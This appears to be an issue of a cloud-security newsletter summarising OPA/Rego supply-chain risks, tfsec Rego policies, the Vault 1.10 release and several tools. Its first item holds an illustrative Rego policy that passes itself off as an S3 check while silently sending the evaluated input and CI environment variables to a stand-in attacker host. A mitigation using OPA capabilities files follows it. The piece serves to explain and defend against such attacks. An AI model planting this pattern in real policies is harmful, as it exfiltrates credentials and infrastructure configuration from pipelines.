This week's articles
Malicious Rego: OPA Supply Chain Attacks
#attack, #opa
Rego is designed for a narrow purpose, so its standard library is understandably small. Even so, much like Terraform, it still has features an attacker can leverage as supply-chain attack vectors. Anyone consuming policies published by a third party should be aware of them.
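As an added illustration (not code from the article or from OPA), here is the shape such a policy can take: a third-party rule that looks like an ordinary S3 check, but whose body also calls the standard-library `http.send` builtin to post the evaluated input, plus the process environment exposed by `opa.runtime()`, to an attacker-controlled host. The package name, the input layout and the collector hostname are assumptions made for the example.

```rego
# Added example, not from the newsletter or the linked article.
# Package name, input shape and collector host are assumptions.
package thirdparty.s3

# The rule a consumer expects, and the only one they usually read.
# Because OPA evaluates rules lazily, the exfiltration is chained into
# this body so it runs on every query of deny, not just on violations.
deny[msg] {
    some name
    bucket := input.resource.aws_s3_bucket[name]

    # Fires for every bucket, before the real check. http.send is a
    # builtin, so nothing is imported and nothing looks out of place.
    http.send({
        "method": "POST",
        "url": "https://collector.example.invalid/ingest",  # assumed attacker host
        "body": {
            "input": input,            # the Terraform plan / config under review
            "env": opa.runtime().env,  # CI environment, often holding credentials
        },
        "raise_error": false,  # never surface a network failure to the caller
    })

    bucket.acl == "public-read"
    msg := sprintf("bucket %v has a public ACL", [name])
}
```

The consumer-side check that addresses this is OPA's capabilities file: running `opa check`, `opa eval` or `opa build` with `--capabilities` pointing at a file whose builtin list omits `http.send` and `opa.runtime` makes compilation fail on any policy that uses them, rather than relying on someone reading every imported rule.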
OPA Rego + tfsec: Custom security policies for your infrastructure
#iac, #opa
Recently, tfsec added support for applying Rego policies to your Terraform code. Rules can be written against simple data structures, and a failure gives the developer rich context: the file path, line numbers, and a highlighted code snippet.
HashiCorp Vault 1.10 Released
#announcement, #vault
Vault 1.10 adds login MFA support, makes Vault an OIDC provider, adds support for PKI to use HSMs, and more.
Tools
access-undenied-aws
Access Undenied parses AWS AccessDenied CloudTrail events, explains the reasons for them, and offers actionable remediation steps. You can also refer to the companion blog post.
gke-poc-toolkit
The GKE Proof of Concept (PoC) Toolkit is a demo generator for Google Kubernetes Engine.
crfs
CRFS is a read-only FUSE filesystem that lets you mount a container image, served directly from a container registry (such as gcr.io), without pulling it all locally first.
Thanks for reading!
If you found this newsletter helpful, I'd really appreciate if you could forward it to your friends and colleagues! If you have questions, comments, or feedback, let me know on Twitter ( @lancinimarco / @CloudSecList), or at feedback.cloudseclist.com! Thanks, Marco